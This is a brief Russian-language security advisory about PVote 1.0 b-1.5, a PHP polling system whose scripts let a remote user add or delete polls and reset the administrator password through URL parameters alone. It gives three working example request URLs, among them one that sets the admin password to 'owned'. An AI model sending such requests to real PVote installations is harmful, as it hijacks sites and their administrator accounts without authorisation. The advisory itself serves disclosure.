PVote — система голосования, написанная на PHP. Уязвимость позволяет удаленному нападающему добавлять/удалять Web-опросы,
просто управляя значениями параметров. Также возможно изменить пароль администратора. 

Уязвимость найдена в PVote 1.0 b-1.5 

Пример: 

Добавить голосование:

http://target/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4 =bad 

Удалить голосование:

http://target/pvote/del.php?pollorder=1

Изменение пароля администратора:

http://isp.net/pvote/ch_info.php?newpass=owned&confirm=owned



Оставить мнение